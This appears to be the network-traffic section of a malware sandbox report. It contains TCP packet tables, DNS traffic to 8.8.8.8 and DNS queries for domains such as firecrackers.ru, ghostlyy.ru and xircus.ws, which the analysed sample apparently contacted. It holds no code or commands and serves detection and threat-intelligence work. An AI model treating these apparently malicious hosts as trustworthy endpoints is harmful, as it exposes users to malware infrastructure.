Aug 1, 2021 13:07:00.026253939 CEST	80	49759	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.030440092 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.062417030 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.063678026 CEST	80	49759	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.124555111 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.130817890 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.134947062 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.197293997 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.197540045 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.207098007 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.216121912 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.219265938 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.293256998 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.300874949 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.316675901 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.321496010 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.375540972 CEST	80	49759	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.375582933 CEST	80	49759	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.389777899 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.396385908 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.495857954 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.512689114 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.512723923 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.553421021 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.553656101 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.556732893 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.619297981 CEST	443	49761	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:00.620457888 CEST	49761	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:16.452548027 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:16.616780996 CEST	80	49768	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:16.616893053 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:16.617347002 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:16.617403984 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:16.783181906 CEST	80	49768	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:16.783230066 CEST	80	49768	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:16.783385992 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:16.820908070 CEST	80	49768	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:18.782388926 CEST	80	49768	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:18.782480001 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:19.637115955 CEST	49768	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:19.638113022 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:19.801172018 CEST	80	49768	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:19.801913023 CEST	80	49770	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:19.804347038 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:20.065203905 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:20.065283060 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:20.230937004 CEST	80	49770	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:20.230993986 CEST	80	49770	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:20.231112003 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:20.273138046 CEST	80	49770	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:22.231615067 CEST	80	49770	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:22.231697083 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.101047993 CEST	49770	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.103770971 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.267503023 CEST	80	49770	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:24.270659924 CEST	80	49771	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:24.270816088 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.271327019 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.271399021 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.435230017 CEST	80	49771	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:24.435400009 CEST	80	49771	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:24.435502052 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:24.475918055 CEST	80	49771	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:26.436074018 CEST	80	49771	64.70.19.203	192.168.2.3
Aug 1, 2021 13:07:26.436238050 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:07:50.817660093 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.819009066 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.873680115 CEST	80	49759	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:50.873857021 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.878449917 CEST	80	49772	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:50.878665924 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.879246950 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.879343033 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.938682079 CEST	80	49772	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:50.938699007 CEST	80	49772	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:50.938711882 CEST	80	49772	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:50.941715002 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:50.943676949 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.004749060 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.004961967 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.005554914 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.066123009 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.066445112 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.066579103 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.067095041 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.069863081 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.132863045 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.139426947 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.139671087 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.148190975 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.208386898 CEST	80	49772	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.208714008 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.212146997 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.311701059 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.342613935 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.342668056 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.342725992 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.342771053 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.343252897 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:51.404079914 CEST	443	49773	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:51.404244900 CEST	49773	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.078567982 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.079569101 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.136405945 CEST	80	49774	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.136648893 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.138004065 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.138143063 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.140337944 CEST	80	49772	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.140454054 CEST	49772	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.194641113 CEST	80	49774	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.194678068 CEST	80	49774	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.194727898 CEST	80	49774	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.194796085 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.196891069 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.255502939 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.255600929 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.256880045 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.316127062 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.316148996 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.316253901 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.316750050 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.319184065 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.376950979 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.428375006 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.428415060 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.428535938 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.429249048 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.429260969 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:54.487308979 CEST	443	49775	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:54.487365007 CEST	49775	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.164412975 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.166011095 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.218664885 CEST	80	49774	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.220174074 CEST	80	49776	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.220256090 CEST	49774	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.220422983 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.221851110 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.222090960 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.276051044 CEST	80	49776	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.276079893 CEST	80	49776	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.276216030 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.279850006 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.315625906 CEST	80	49776	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.339159012 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.339270115 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.340857983 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.400161982 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.400429964 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.400511026 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.401268005 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.403887033 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.463587046 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.469744921 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.469866037 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.471903086 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.526246071 CEST	80	49776	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.527034044 CEST	80	49776	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.528134108 CEST	49776	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.531229973 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.627715111 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.642549992 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.642574072 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.642621040 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.642663956 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.643060923 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:57.703979969 CEST	443	49777	91.234.34.80	192.168.2.3
Aug 1, 2021 13:07:57.704057932 CEST	49777	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:08:10.332623959 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:10.333556890 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:10.497884989 CEST	80	49778	64.70.19.203	192.168.2.3
Aug 1, 2021 13:08:10.498029947 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:10.499155998 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:10.499351025 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:10.665988922 CEST	80	49778	64.70.19.203	192.168.2.3
Aug 1, 2021 13:08:10.666026115 CEST	80	49778	64.70.19.203	192.168.2.3
Aug 1, 2021 13:08:10.666146040 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:10.706187963 CEST	80	49778	64.70.19.203	192.168.2.3
Aug 1, 2021 13:08:10.797218084 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:11.634238958 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:12.666616917 CEST	80	49778	64.70.19.203	192.168.2.3
Aug 1, 2021 13:08:12.667095900 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:13.313158989 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:13.355175018 CEST	49778	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:13.519314051 CEST	80	49778	64.70.19.203	192.168.2.3
Aug 1, 2021 13:08:16.657346964 CEST	49771	80	192.168.2.3	64.70.19.203
Aug 1, 2021 13:08:23.360754013 CEST	49771	80	192.168.2.3	64.70.19.203

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2021 13:03:59.079646111 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:03:59.104293108 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:00.429706097 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:00.455059052 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:01.722009897 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:01.748398066 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:02.711066008 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:02.736361027 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:04.081187010 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:04.106359959 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:04.893054962 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:04.918183088 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:05.870687962 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:05.908555031 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:06.690917969 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:06.727405071 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:07.480101109 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:07.508029938 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:09.252897978 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:09.280936956 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:10.061136007 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:10.087346077 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:11.286494017 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:11.312702894 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:12.277384043 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:12.304982901 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:13.489933968 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:13.517883062 CEST	53	57568	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:14.620044947 CEST	50540	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:14.657397985 CEST	53	50540	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:15.615674973 CEST	54366	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:15.648533106 CEST	53	54366	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:16.942433119 CEST	53034	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:16.976912022 CEST	53	53034	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:31.982784986 CEST	57762	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:32.010869026 CEST	53	57762	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:35.294456959 CEST	55435	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:35.332178116 CEST	53	55435	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:48.753854036 CEST	50713	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:48.795526028 CEST	53	50713	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:54.328346968 CEST	56132	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:54.365592003 CEST	53	56132	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:55.848320007 CEST	58987	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:55.880796909 CEST	53	58987	8.8.8.8	192.168.2.3
Aug 1, 2021 13:04:57.700298071 CEST	56579	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:04:57.742475033 CEST	53	56579	8.8.8.8	192.168.2.3
Aug 1, 2021 13:05:01.059005022 CEST	60633	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:05:01.093004942 CEST	53	60633	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:19.409800053 CEST	61292	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:19.444833040 CEST	53	61292	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:20.452507019 CEST	63619	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:20.503679037 CEST	53	63619	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:27.372970104 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:27.414814949 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:29.903559923 CEST	61946	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:29.937520027 CEST	53	61946	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:45.543560982 CEST	64910	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:46.002810001 CEST	53	64910	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:48.677867889 CEST	52123	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:48.725323915 CEST	53	52123	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:51.556061983 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:51.591469049 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:52.546403885 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:52.579235077 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:57.337552071 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:57.371470928 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:58.582233906 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:58.634175062 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:59.067569017 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:59.101555109 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:59.509341955 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:06:59.543703079 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 1, 2021 13:06:59.956882954 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:00.011153936 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:00.486965895 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:00.520090103 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:02.314109087 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:02.347450972 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:04.054728031 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:04.088500023 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:04.676805019 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:04.714617014 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:05.245413065 CEST	64124	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:05.283432007 CEST	53	64124	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:05.616831064 CEST	49361	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:05.649738073 CEST	53	49361	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:06.873672962 CEST	63150	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:06.907207966 CEST	53	63150	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:10.030391932 CEST	53279	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:10.535051107 CEST	53	53279	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:13.689893007 CEST	56881	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:13.874402046 CEST	53	56881	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:16.415985107 CEST	53642	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:16.450809002 CEST	53	53642	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:16.955894947 CEST	55667	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:16.993421078 CEST	53	55667	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:17.845803976 CEST	54833	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:17.883980036 CEST	53	54833	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:20.569139957 CEST	62476	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:20.603168964 CEST	53	62476	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:27.582727909 CEST	49705	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:27.617341995 CEST	53	49705	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:30.750453949 CEST	61477	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:31.242046118 CEST	53	61477	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:34.400907993 CEST	61633	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:34.478733063 CEST	53	61633	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:37.614039898 CEST	55949	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:38.066858053 CEST	53	55949	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:41.208498955 CEST	57601	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:41.260489941 CEST	53	57601	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:44.392422915 CEST	49342	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:44.912379026 CEST	53	49342	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:48.231177092 CEST	56253	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:48.304867029 CEST	53	56253	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:51.526628971 CEST	49667	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:51.559415102 CEST	53	49667	8.8.8.8	192.168.2.3
Aug 1, 2021 13:07:54.615502119 CEST	55439	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:07:54.642896891 CEST	53	55439	8.8.8.8	192.168.2.3
Aug 1, 2021 13:08:00.876514912 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:08:00.909454107 CEST	53	57069	8.8.8.8	192.168.2.3
Aug 1, 2021 13:08:04.040344000 CEST	57659	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:08:04.614290953 CEST	53	57659	8.8.8.8	192.168.2.3
Aug 1, 2021 13:08:07.765604973 CEST	54717	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:08:07.798222065 CEST	53	54717	8.8.8.8	192.168.2.3
Aug 1, 2021 13:08:10.807061911 CEST	63975	53	192.168.2.3	8.8.8.8
Aug 1, 2021 13:08:10.841388941 CEST	53	63975	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 1, 2021 13:06:45.543560982 CEST	192.168.2.3	8.8.8.8	0xa900	Standard query (0)	flamable.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:48.677867889 CEST	192.168.2.3	8.8.8.8	0x9dca	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:51.556061983 CEST	192.168.2.3	8.8.8.8	0x6e29	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:52.546403885 CEST	192.168.2.3	8.8.8.8	0xe87c	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:06:57.337552071 CEST	192.168.2.3	8.8.8.8	0xfbff	Standard query (0)	firecrackers.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:06.873672962 CEST	192.168.2.3	8.8.8.8	0xae4f	Standard query (0)	ghostlyy.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:10.030391932 CEST	192.168.2.3	8.8.8.8	0x5171	Standard query (0)	cooperal.ru	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:13.689893007 CEST	192.168.2.3	8.8.8.8	0xf25e	Standard query (0)	xircus.ws	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:16.415985107 CEST	192.168.2.3	8.8.8.8	0x8dce	Standard query (0)	xircus.ws	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:16.955894947 CEST	192.168.2.3	8.8.8.8	0x908a	Standard query (0)	xircus.ws	A (IP address)	IN (0x0001)
Aug 1, 2021 13:07:20.569139957 CEST	192.168.2.3	8.8.8.8	0x3958	Standard query (0)	xircus.ws	A (IP address)	IN (0x0001)
